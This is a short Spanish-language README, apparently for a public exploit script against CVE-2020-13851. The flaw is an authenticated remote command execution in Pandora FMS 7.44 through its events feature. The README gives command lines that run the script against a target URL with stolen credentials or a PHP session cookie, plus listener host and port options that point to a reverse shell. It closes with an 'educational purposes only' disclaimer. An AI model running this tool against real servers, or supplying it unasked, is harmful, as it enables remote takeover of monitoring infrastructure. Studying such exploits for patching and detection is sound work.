
CVE-2020-13851 Pandora FMS 7.44
Pandora FMS 7.44 CVE-2020-13851 RCE permite a un usuario autenticado lograr la ejecución remota de comandos a través de la funcionalidad de eventos. Se puede realizar con credenciales o una cookie de sesión PHP.
python3 pandorafms_7.44.py -t http://pwnedpandora.com/ -u username -p password -lhost 127.0.0.1 -lport 1337
python3 pandorafms_7.44.py -t http://pwnedpandora.com/ -c PHPSESSID -lhost 127.0.0.1 -lport 1337
Para el menú de ayuda
python3 pandorafms_7.44.py -h
Todo el código proporcionado en este repositorio es solo para fines educativos/de investigación. Cualquier acción y/o actividad relacionada con el material contenido en este repositorio es de su entera responsabilidad. El mal uso del código en este repositorio puede resultar en cargos penales contra las personas en cuestión. El autor no será considerado responsable en caso de que se presenten cargos penales contra cualquier persona que haga mal uso del código en este repositorio para infringir la ley.